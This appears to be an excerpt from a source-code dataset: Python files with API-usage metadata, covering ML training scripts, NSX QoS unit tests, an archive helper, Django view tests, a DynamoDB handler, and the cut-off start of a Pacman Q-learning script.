[ { "api_name": "bananas.url.database_conf_from_url", "line_number": 10, "usage_type": "call" }, { "api_name": "os.environ.get", "line_number": 10, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 10, "usage_type": "name" }, { "api_name": "os.environ.get", "line_number": 13, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 13, "usage_type": "name" }, { "api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 16, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 19, "usage_type": "call" }, { "api_name": "os.path", "line_number": 19, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 24, "usage_type": "call" }, { "api_name": "os.path", "line_number": 24, "usage_type": "attribute" }, { "api_name": "os.environ.get", "line_number": 31, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 31, "usage_type": "name" }, { "api_name": "os.environ.get", "line_number": 37, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 37, "usage_type": "name" } ]
62033484
import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' import yeast_dataset_folded as yemd from solver_folded import Solver import tensorflow as tf tf.random.set_seed(1234) import numpy as np np.random.seed(1234) import time import argparse parser = argparse.ArgumentParser() parser.add_argument("-n", "--neighbors", dest="num_neighbors", default=10, type=int, help="The number of neighbors to retrieve from the Neareset Neighbors model") parser.add_argument("-a", "--augmentations", dest="num_augmentations", default=4, type=int, help="The number test-time augmentations to apply on every test sample") parser.add_argument("-f", "--folds", dest="n_folds", default=10, type=int, help="The number of folds in the K-Fold cross-validation") args = parser.parse_args() def get_execute_time(start_time, end_time): hours, rem = divmod(end_time - start_time, 3600) minutes, seconds = divmod(rem, 60) print("{:0>2}:{:0>2}:{:05.2f}".format(int(hours), int(minutes), seconds)) HOME_PATH = '/home/nivgold' EPOCHS = 500 YEAST_DIM = 8 start_time = time.time() yeast_X, yeast_y, yeast_pairs = yemd.get_dataset(HOME_PATH, 32, from_disk=True) end_train_test = time.time() print("--- Yeast dataset ready after: ", end='') get_execute_time(start_time, end_train_test) dataset_name = 'yeast' weights_path = '/home/nivgold/models/oversampling_models' solver_obj = Solver(X=yeast_X, y=yeast_y, n_folds=args.n_folds, dataset_name=dataset_name, epochs=EPOCHS, features_dim=YEAST_DIM, siamese_data=yeast_pairs) # TRAINING start_time = time.time() print("Start training...") solver_obj.train_folded() end_training = time.time() print("---training finished after: ", end='') get_execute_time(start_time, end_training) # # saving the trained weights # solver_obj.save_weights_folded(path=weights_path) # solver_obj.load_weights_folded(weights_path) # TEST WITHOUT TTA start_time = time.time() print("--- Start baseline testing...") solver_obj.test_folded() end_testing = time.time() print("--- Baseline testing finished after: ", end='') get_execute_time(start_time, end_testing) # TEST WITH TTA num_neighbors = args.num_neighbors num_augmentations = args.num_augmentations start_time = time.time() print(f"--- Start TTA testing with: \t {num_neighbors} neighbors, {num_augmentations} TTA augmentations") solver_obj.test_tta_folded(num_neighbors=num_neighbors, num_augmentations=num_augmentations) end_tta_testing = time.time() print("--- TTA testing finished after: ", end='') get_execute_time(start_time, end_tta_testing) solver_obj.print_test_results()
null
oversampling/run_yeast_folded.py
run_yeast_folded.py
py
2,548
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.environ", "line_number": 2, "usage_type": "attribute" }, { "api_name": "tensorflow.random.set_seed", "line_number": 8, "usage_type": "call" }, { "api_name": "tensorflow.random", "line_number": 8, "usage_type": "attribute" }, { "api_name": "numpy.random.seed", "line_number": 10, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 10, "usage_type": "attribute" }, { "api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call" }, { "api_name": "time.time", "line_number": 29, "usage_type": "call" }, { "api_name": "yeast_dataset_folded.get_dataset", "line_number": 30, "usage_type": "call" }, { "api_name": "time.time", "line_number": 31, "usage_type": "call" }, { "api_name": "solver_folded.Solver", "line_number": 36, "usage_type": "call" }, { "api_name": "time.time", "line_number": 39, "usage_type": "call" }, { "api_name": "time.time", "line_number": 42, "usage_type": "call" }, { "api_name": "time.time", "line_number": 51, "usage_type": "call" }, { "api_name": "time.time", "line_number": 54, "usage_type": "call" }, { "api_name": "time.time", "line_number": 62, "usage_type": "call" }, { "api_name": "time.time", "line_number": 65, "usage_type": "call" } ]
437687673
# Copyright (c) 2015 VMware, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. # import mock from oslo_log import log from oslo_serialization import jsonutils from vmware_nsx.nsxlib import v3 as nsxlib from vmware_nsx.tests.unit.nsx_v3 import test_constants as test_constants_v3 from vmware_nsx.tests.unit.nsxlib.v3 import nsxlib_testcase from vmware_nsx.tests.unit.nsxlib.v3 import test_client LOG = log.getLogger(__name__) class NsxLibQosTestCase(nsxlib_testcase.NsxClientTestCase): def _body(self, qos_marking=None, dscp=None, description=test_constants_v3.FAKE_NAME): body = { "resource_type": "QosSwitchingProfile", "tags": [] } if qos_marking: body = nsxlib._update_dscp_in_args(body, qos_marking, dscp) body["display_name"] = test_constants_v3.FAKE_NAME body["description"] = description return body def _body_with_shaping(self, shaping_enabled=False, burst_size=None, peak_bandwidth=None, average_bandwidth=None, description=test_constants_v3.FAKE_NAME, qos_marking=None, dscp=0): body = test_constants_v3.FAKE_QOS_PROFILE body["display_name"] = test_constants_v3.FAKE_NAME body["description"] = description for shaper in body["shaper_configuration"]: # Neutron currently support only shaping of Egress traffic if shaper["resource_type"] == "EgressRateShaper": shaper["enabled"] = shaping_enabled if burst_size: shaper["burst_size_bytes"] = burst_size if peak_bandwidth: shaper["peak_bandwidth_mbps"] = peak_bandwidth if average_bandwidth: shaper["average_bandwidth_mbps"] = average_bandwidth break if qos_marking: body = nsxlib._update_dscp_in_args(body, qos_marking, dscp) return body def test_create_qos_switching_profile(self): """ Test creating a qos-switching profile returns the correct response """ api = self.mocked_rest_fns(nsxlib, 'client') nsxlib.create_qos_switching_profile( tags=[], name=test_constants_v3.FAKE_NAME, description=test_constants_v3.FAKE_NAME) test_client.assert_json_call( 'post', api, 'https://1.2.3.4/api/v1/switching-profiles', data=jsonutils.dumps(self._body(), sort_keys=True)) def test_update_qos_switching_profile(self): """ Test updating a qos-switching profile returns the correct response """ api = self.mocked_rest_fns(nsxlib, 'client') original_profile = self._body() new_description = "Test" with mock.patch.object(nsxlib.client, 'get_resource', return_value=original_profile): # update the description of the profile nsxlib.update_qos_switching_profile( test_constants_v3.FAKE_QOS_PROFILE['id'], tags=[], description=new_description) test_client.assert_json_call( 'put', api, 'https://1.2.3.4/api/v1/switching-profiles/%s' % test_constants_v3.FAKE_QOS_PROFILE['id'], data=jsonutils.dumps(self._body(description=new_description), sort_keys=True)) def test_enable_qos_switching_profile_shaping(self): """ Test updating a qos-switching profile returns the correct response """ api = self.mocked_rest_fns(nsxlib, 'client') original_profile = self._body_with_shaping() burst_size = 100 peak_bandwidth = 200 average_bandwidth = 300 qos_marking = "untrusted" dscp = 10 with mock.patch.object(nsxlib.client, 'get_resource', return_value=original_profile): # update the bw shaping of the profile nsxlib.update_qos_switching_profile_shaping( test_constants_v3.FAKE_QOS_PROFILE['id'], shaping_enabled=True, burst_size=burst_size, peak_bandwidth=peak_bandwidth, average_bandwidth=average_bandwidth, qos_marking=qos_marking, dscp=dscp) test_client.assert_json_call( 'put', api, 'https://1.2.3.4/api/v1/switching-profiles/%s' % test_constants_v3.FAKE_QOS_PROFILE['id'], data=jsonutils.dumps( self._body_with_shaping( shaping_enabled=True, burst_size=burst_size, peak_bandwidth=peak_bandwidth, average_bandwidth=average_bandwidth, qos_marking="untrusted", dscp=10), sort_keys=True)) def test_disable_qos_switching_profile_shaping(self): """ Test updating a qos-switching profile returns the correct response """ api = self.mocked_rest_fns(nsxlib, 'client') burst_size = 100 peak_bandwidth = 200 average_bandwidth = 300 original_profile = self._body_with_shaping( shaping_enabled=True, burst_size=burst_size, peak_bandwidth=peak_bandwidth, average_bandwidth=average_bandwidth, qos_marking="untrusted", dscp=10) with mock.patch.object(nsxlib.client, 'get_resource', return_value=original_profile): # update the bw shaping of the profile nsxlib.update_qos_switching_profile_shaping( test_constants_v3.FAKE_QOS_PROFILE['id'], shaping_enabled=False, qos_marking="trusted") test_client.assert_json_call( 'put', api, 'https://1.2.3.4/api/v1/switching-profiles/%s' % test_constants_v3.FAKE_QOS_PROFILE['id'], data=jsonutils.dumps( self._body_with_shaping(qos_marking="trusted"), sort_keys=True)) def test_delete_qos_switching_profile(self): """ Test deleting qos-switching-profile """ api = self.mocked_rest_fns(nsxlib, 'client') nsxlib.delete_qos_switching_profile( test_constants_v3.FAKE_QOS_PROFILE['id']) test_client.assert_json_call( 'delete', api, 'https://1.2.3.4/api/v1/switching-profiles/%s' % test_constants_v3.FAKE_QOS_PROFILE['id'])
null
vmware_nsx/tests/unit/nsxlib/v3/test_qos_switching_profile.py
test_qos_switching_profile.py
py
7,353
python
en
code
null
code-starcoder2
83
[ { "api_name": "oslo_log.log.getLogger", "line_number": 26, "usage_type": "call" }, { "api_name": "oslo_log.log", "line_number": 26, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.nsxlib_testcase.NsxClientTestCase", "line_number": 29, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.nsxlib_testcase", "line_number": 29, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_NAME", "line_number": 32, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 32, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3._update_dscp_in_args", "line_number": 38, "usage_type": "call" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 38, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_NAME", "line_number": 40, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 40, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_NAME", "line_number": 49, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 49, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 52, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 52, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_NAME", "line_number": 53, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 53, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3._update_dscp_in_args", "line_number": 69, "usage_type": "call" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 69, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 77, "usage_type": "argument" }, { "api_name": "vmware_nsx.nsxlib.v3.create_qos_switching_profile", "line_number": 79, "usage_type": "call" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 79, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_NAME", "line_number": 81, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 81, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_NAME", "line_number": 82, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 82, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client.assert_json_call", "line_number": 84, "usage_type": "call" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client", "line_number": 84, "usage_type": "name" }, { "api_name": "oslo_serialization.jsonutils.dumps", "line_number": 87, "usage_type": "call" }, { "api_name": "oslo_serialization.jsonutils", "line_number": 87, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 94, "usage_type": "argument" }, { "api_name": "mock.patch.object", "line_number": 98, "usage_type": "call" }, { "api_name": "mock.patch", "line_number": 98, "usage_type": "attribute" }, { "api_name": "vmware_nsx.nsxlib.v3.client", "line_number": 98, "usage_type": "attribute" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 98, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3.update_qos_switching_profile", "line_number": 101, "usage_type": "call" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 101, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 102, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 102, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client.assert_json_call", "line_number": 106, "usage_type": "call" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client", "line_number": 106, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 109, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 109, "usage_type": "name" }, { "api_name": "oslo_serialization.jsonutils.dumps", "line_number": 110, "usage_type": "call" }, { "api_name": "oslo_serialization.jsonutils", "line_number": 110, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 117, "usage_type": "argument" }, { "api_name": "mock.patch.object", "line_number": 125, "usage_type": "call" }, { "api_name": "mock.patch", "line_number": 125, "usage_type": "attribute" }, { "api_name": "vmware_nsx.nsxlib.v3.client", "line_number": 125, "usage_type": "attribute" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 125, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3.update_qos_switching_profile_shaping", "line_number": 128, "usage_type": "call" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 128, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 129, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 129, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client.assert_json_call", "line_number": 137, "usage_type": "call" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client", "line_number": 137, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 140, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 140, "usage_type": "name" }, { "api_name": "oslo_serialization.jsonutils.dumps", "line_number": 141, "usage_type": "call" }, { "api_name": "oslo_serialization.jsonutils", "line_number": 141, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 154, "usage_type": "argument" }, { "api_name": "mock.patch.object", "line_number": 166, "usage_type": "call" }, { "api_name": "mock.patch", "line_number": 166, "usage_type": "attribute" }, { "api_name": "vmware_nsx.nsxlib.v3.client", "line_number": 166, "usage_type": "attribute" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 166, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3.update_qos_switching_profile_shaping", "line_number": 169, "usage_type": "call" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 169, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 170, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 170, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client.assert_json_call", "line_number": 173, "usage_type": "call" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client", "line_number": 173, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 176, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 176, "usage_type": "name" }, { "api_name": "oslo_serialization.jsonutils.dumps", "line_number": 177, "usage_type": "call" }, { "api_name": "oslo_serialization.jsonutils", "line_number": 177, "usage_type": "name" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 185, "usage_type": "argument" }, { "api_name": "vmware_nsx.nsxlib.v3.delete_qos_switching_profile", "line_number": 187, "usage_type": "call" }, { "api_name": "vmware_nsx.nsxlib.v3", "line_number": 187, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 188, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 188, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client.assert_json_call", "line_number": 190, "usage_type": "call" }, { "api_name": "vmware_nsx.tests.unit.nsxlib.v3.test_client", "line_number": 190, "usage_type": "name" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants.FAKE_QOS_PROFILE", "line_number": 193, "usage_type": "attribute" }, { "api_name": "vmware_nsx.tests.unit.nsx_v3.test_constants", "line_number": 193, "usage_type": "name" } ]
146552310
# # Python class file to manage archives # # Author: Kyle Manna < kmanna [at] fan [dot] tv > import re import os import shutil import logging import tarfile import subprocess class ManifestArchive: def __init__(self, filename): self.filename = filename base = os.path.basename(self.filename) (root, ext) = os.path.splitext(base) self.ext = ext.lstrip('.') self.root = re.sub('\.tar.*$', '', root) def extract(self, dst='.', strip=True): # Leverage pxz if available if shutil.which('pxz') and self.ext == 'xz': logging.debug("Using pxz for compression") if strip: xform = '--strip 1' else: xform = '' # Hand it over to cmd line tools since multiple pipes in python is painful # and leverage pxz for best performance cmd_tar = 'pxz -d < {} | tar -xf - {}'.format(self.filename, xform) logging.debug("cmd: {}".format(cmd_tar)) subprocess.call(cmd_tar, shell=True) def create(self, source, strip=True): # Leverage pxz if available if shutil.which('pxz') and self.ext == 'xz': logging.debug("Using pxz for compression") if strip: xform = '--xform \'s:^{}/:{}/:\''.format(source.lstrip('/'), self.root) else: xform = '' # Hand it over to cmd line tools since multiple pipes in python is painful # and leverage pxz for best performance cmd_tar = 'tar -cf - {} {} | pxz > {}'.format(source, xform, self.filename) logging.debug("cmd: {}".format(cmd_tar)) subprocess.call(cmd_tar, shell=True) else: # Failsafe tarball + compression (slow!) with tarfile.open(self.filename, 'w:{}'.format(self.ext)) as tar: xform = None if strip: xform = self.root tar.add(source, arcname=xform)
null
archives.py
archives.py
py
1,987
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.path.basename", "line_number": 17, "usage_type": "call" }, { "api_name": "os.path", "line_number": 17, "usage_type": "attribute" }, { "api_name": "os.path.splitext", "line_number": 18, "usage_type": "call" }, { "api_name": "os.path", "line_number": 18, "usage_type": "attribute" }, { "api_name": "re.sub", "line_number": 20, "usage_type": "call" }, { "api_name": "shutil.which", "line_number": 24, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 25, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 33, "usage_type": "call" }, { "api_name": "subprocess.call", "line_number": 34, "usage_type": "call" }, { "api_name": "shutil.which", "line_number": 39, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 40, "usage_type": "call" }, { "api_name": "logging.debug", "line_number": 50, "usage_type": "call" }, { "api_name": "subprocess.call", "line_number": 51, "usage_type": "call" }, { "api_name": "tarfile.open", "line_number": 54, "usage_type": "call" } ]
646375541
from django.db.models import Q from django.test import Client, TestCase from django.urls import reverse from unittest.mock import Mock, patch from app.models import Book from app.tests.tests_utils import GoogleBookResponse class TestViews(TestCase): def setUp(self): self.client = Client() self.add_url = reverse("db") self.list_url = reverse("book-list") self.id = 1 self.detail_url = reverse("book-detail", args=[str(self.id)]) Book.objects.create( pk=self.id, title="book", authors=["author"], published_date="1999-01-01" ) def test_book_list_GET_positive(self): response = self.client.get(self.list_url) expected_response = { "count": 1, "next": None, "previous": None, "results": [ { "id": self.id, "title": "book", "authors": ["author"], "published_date": "1999-01-01", "categories": None, "average_rating": None, "rating_count": None, "thumbnail": None, } ], } self.assertEquals(response.status_code, 200) self.assertJSONEqual(str(response.content, encoding="utf8"), expected_response) def test_book_list_GET_negative(self): response = self.client.get(self.list_url) expected_response = { "count": 1, "next": None, "previous": None, "results": [ { "id": self.id, "title": "book", "authors": ["author"], "published_date": "1999-01-02", "categories": None, "average_rating": None, "rating_count": None, "thumbnail": None, } ], } self.assertEquals(response.status_code, 200) self.assertJSONNotEqual(str(response.content, encoding="utf8"), expected_response) def test_book_detail_GET(self): response = self.client.get(self.detail_url) expected_response = { "id": 1, "title": "book", "authors": ["author"], "published_date": "1999-01-01", "categories": None, "average_rating": None, "rating_count": None, "thumbnail": None, } self.assertEquals(response.status_code, 200) self.assertJSONEqual(str(response.content, encoding="utf8"), expected_response) def test_book_add_POST_adds_new_book(self): posting_object = {"q": "x"} expected_response = { "items": [ { "volumeInfo": { "title": "book0", "authors": ["John", "F"], "publishedDate": "1999-01-01", } }, { "volumeInfo": { "title": "book1", "authors": ["Kennedy"], "publishedDate": "2000-01-01", } }, ] } with patch( "app.views_utils.requests.get", Mock(return_value=GoogleBookResponse(expected_response)) ): self.client.post(self.add_url, posting_object) books = Book.objects.filter(Q(title="book0") | Q(title="book1")) for book in books: assert book.title in ["book0", "book1"] def test_book_add_POST_adds_new_book_empty_list(self): posting_object = {"q": "x"} expected_response = {"items": None} with patch( "app.views_utils.requests.get", Mock(return_value=GoogleBookResponse(expected_response)) ): response = self.client.post(self.add_url, posting_object) self.assertEquals(response["status"], "books not added")
null
app/tests/test_views.py
test_views.py
py
4,065
python
en
code
null
code-starcoder2
83
[ { "api_name": "django.test.TestCase", "line_number": 10, "usage_type": "name" }, { "api_name": "django.test.Client", "line_number": 12, "usage_type": "call" }, { "api_name": "django.urls.reverse", "line_number": 13, "usage_type": "call" }, { "api_name": "django.urls.reverse", "line_number": 14, "usage_type": "call" }, { "api_name": "django.urls.reverse", "line_number": 16, "usage_type": "call" }, { "api_name": "app.models.Book.objects.create", "line_number": 18, "usage_type": "call" }, { "api_name": "app.models.Book.objects", "line_number": 18, "usage_type": "attribute" }, { "api_name": "app.models.Book", "line_number": 18, "usage_type": "name" }, { "api_name": "unittest.mock.patch", "line_number": 105, "usage_type": "call" }, { "api_name": "unittest.mock.Mock", "line_number": 106, "usage_type": "call" }, { "api_name": "app.tests.tests_utils.GoogleBookResponse", "line_number": 106, "usage_type": "call" }, { "api_name": "app.models.Book.objects.filter", "line_number": 110, "usage_type": "call" }, { "api_name": "app.models.Book.objects", "line_number": 110, "usage_type": "attribute" }, { "api_name": "app.models.Book", "line_number": 110, "usage_type": "name" }, { "api_name": "django.db.models.Q", "line_number": 110, "usage_type": "call" }, { "api_name": "unittest.mock.patch", "line_number": 118, "usage_type": "call" }, { "api_name": "unittest.mock.Mock", "line_number": 119, "usage_type": "call" }, { "api_name": "app.tests.tests_utils.GoogleBookResponse", "line_number": 119, "usage_type": "call" } ]
251873108
import json import utils.response as res from config import dynamodb def handler(event, context): try: # Get input from user. path_parameters = event.get('pathParameters') # Activity activity = path_parameters.get('activity') # Check if Null. if (activity is None): raise Exception("Activity not found.") # Get response from database. response = dynamodb.get_item( TableName="Activities", Key={ 'Identifier': { 'S': activity } } ).get("Item") # Check item exists if (response is None): raise Exception("Activity not found.") # Build Response Object response = { 'Identifier': activity, 'Cost': response.get('Cost', {}).get('N'), 'Description': response.get('Description', {}).get('S'), 'Host': response.get('Host', {}).get('S'), 'Image': response.get('Image', {}).get('S'), 'Location': response.get('Location', {}).get('S'), 'Name': response.get('Name', {}).get('S'), 'Virtual': response.get('Virtual', {}).get('BOOL'), 'Timestamp': response.get('Timestamp', {}).get('S'), 'Penalty': response.get('Penalty', {}).get('N'), 'Postcode': response.get('Postcode', {}).get('S'), 'Latitude': response.get('Latitude', {}).get('N'), 'Longitude': response.get('Longitude', {}).get('N') } return res.build(200, response) except Exception as e: print(str(e)) return res.build(400, None)
null
functions/activity.py
activity.py
py
1,669
python
en
code
null
code-starcoder2
83
[ { "api_name": "config.dynamodb.get_item", "line_number": 19, "usage_type": "call" }, { "api_name": "config.dynamodb", "line_number": 19, "usage_type": "name" }, { "api_name": "utils.response.build", "line_number": 45, "usage_type": "call" }, { "api_name": "utils.response", "line_number": 45, "usage_type": "name" }, { "api_name": "utils.response.build", "line_number": 51, "usage_type": "call" }, { "api_name": "utils.response", "line_number": 51, "usage_type": "name" } ]
227745594
import argparse import sys import os import pathlib import tempfile import numpy as np import random import torch import torch.nn as nn import torch.optim as optim from pacman import init_env from functools import reduce from tqdm import tqdm # Parse argument parser = argparse.ArgumentParser(description='Training LSM with Q-Learning for balancing cartpole', formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--seed', default=1993, type=int, help='random seed') parser.add_argument('--checkpoint_dir', default=None, help='name of checkpoint directory') parser.add_argument('--overwrite', dest='overwrite', action='store_true', help='overwrite the existing log file') # Additional arguments for q-learning parser.add_argument('--lr', default=2e-4, type=float, help='learning rate') parser.add_argument('--train_epoches', default=100, type=int, help='number of training epoches') parser.add_argument('--train_steps', default=5e4, type=float, help='number of training steps per each training epoch') parser.add_argument('--start_steps', default=1e2, type=float, help='number of training steps to start training') parser.add_argument('--train_freq', default=1, type=int, help='frequency of training readout layer') parser.add_argument('--final_eps', default=1e-1, type=float, help='final exploration rate') parser.add_argument('--gamma', default=0.95, type=float, help='discount factor') parser.add_argument('--log_freq', default=100, type=int, help='number of game episodes to log training progress') parser.add_argument('--buffer_size', default=1e6, type=float, help='replay buffer size') parser.add_argument('--batch_size', default=32, type=int, help='batch of experience replay') parser.add_argument('--target_network_update_freq', default=1e4, type=float, help='frequency of updating target network') parser.add_argument('--test', dest='test', action='store_true', help='test model without reward clipping') parser.add_argument('--test_steps', default=1e3, type=float, help='number of testing steps per each training epoch') # Additional arguments for liquid parser.add_argument('--rate_scale', default=0.1, type=float, help='scaling factor of the input maximum firing rate') parser.add_argument('--t_sim', default=0.100, type=float, help='single example simulation time') parser.add_argument('--t_prb_start', default=0.000, type=float, help='time to start collecting spike activity') parser.add_argument('--t_prb_stop', default=0.100, type=float, help='time to stop collecting spike activity') parser.add_argument('--n_neurons', default=150, type=int, help='total number of LSM neurons') parser.add_argument('--hidden_size', default=32, type=int, help='number of hidden neurons in readout for dimensional reduction') parser.add_argument('--warmup_steps', default=100, type=int, help='number of the warmup samples for LSM before actual training') # Additional argument for Pacman parser.add_argument('--maze_path', default='./pacman/mazes/smallF3G1C0.maze', help='path to pacman maze') def main(): # Parse argument global args args = parser.parse_args() # Add extra arguments args.env_name = 'Pacman' args.total_steps = int(args.train_epoches*args.train_steps) args.test_steps = int(args.test_steps) args.checkpoint_freq = int(args.train_steps) args.buffer_size = int(args.buffer_size) if args.buffer_size < args.total_steps else args.total_steps args.exploration_steps = int(0.2*args.total_steps) args.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # Initialize random seed np.random.seed(args.seed) random.seed(args.seed) torch.manual_seed(args.seed) if args.device == 'cuda': torch.cuda.manual_seed_all(args.seed) # Create environment env = init_env(maze_path=args.maze_path, save_frame=False, display=False) if args.test: test(env) else: learn(env) # Linear scheduler for epsilon-greedy policy # This class is replicated from https://github.com/openai/baselines/blob/master/baselines/common/schedules.py class LinearSchedule(object): def __init__(self, schedule_steps, final_p, initial_p=1.0): """Linear interpolation between initial_p and final_p over schedule_steps. After this many steps pass final_p is returned. Parameters ---------- schedule_steps: int Number of steps for which to linearly anneal initial_p to final_p initial_p: float initial output value final_p: float final output value """ self.schedule_steps = float(schedule_steps) self.final_p = final_p self.initial_p = initial_p def value(self, t): """See Schedule.value""" fraction = min(float(t) / self.schedule_steps, 1.0) return self.initial_p + fraction * (self.final_p - self.initial_p) # Replay buffer for experience replay # This class is modified from https://github.com/openai/baselines/blob/master/baselines/deepq/replay_buffer.py class ReplayBuffer(object): def __init__(self, size): """Create Replay buffer. Parameters ---------- size: int Max number of transitions to store in the buffer. When the buffer overflows the old memories are dropped. """ self._storage = [] self._maxsize = size self._next_idx = 0 def __len__(self): return len(self._storage) def add(self, obs_t, action, reward, obs_tp1): data = (obs_t, action, reward, obs_tp1) if self._next_idx >= len(self._storage): self._storage.append(data) else: self._storage[self._next_idx] = data self._next_idx = (self._next_idx + 1) % self._maxsize def _encode_sample(self, idxes): obses_t, actions, rewards, obses_tp1 = [], [], [], [] for i in idxes: data = self._storage[i] obs_t, action, reward, obs_tp1 = data obses_t.append(obs_t) actions.append(action) rewards.append(reward) obses_tp1.append(obs_tp1) return obses_t, actions, rewards, obses_tp1 def sample(self, batch_size): """Sample a batch of experiences. Parameters ---------- batch_size: int How many transitions to sample. Returns ------- obs_batch: np.array batch of observations act_batch: np.array batch of actions executed given obs_batch rew_batch: np.array rewards received as results of executing act_batch next_obs_batch: np.array next set of observations seen after executing act_batch done_mask: np.array done_mask[i] = 1 if executing act_batch[i] resulted in the end of an episode and 0 otherwise. """ idxes = [random.randint(0, len(self._storage) - 1) for _ in range(batch_size)] return self._encode_sample(idxes) # Simple non-spiking model for readout layer class MLP(nn.Module): def __init__(self, inp_size, hidden_size, outp_size): super(MLP, self).__init__() list_m = [ nn.Linear(inp_size, 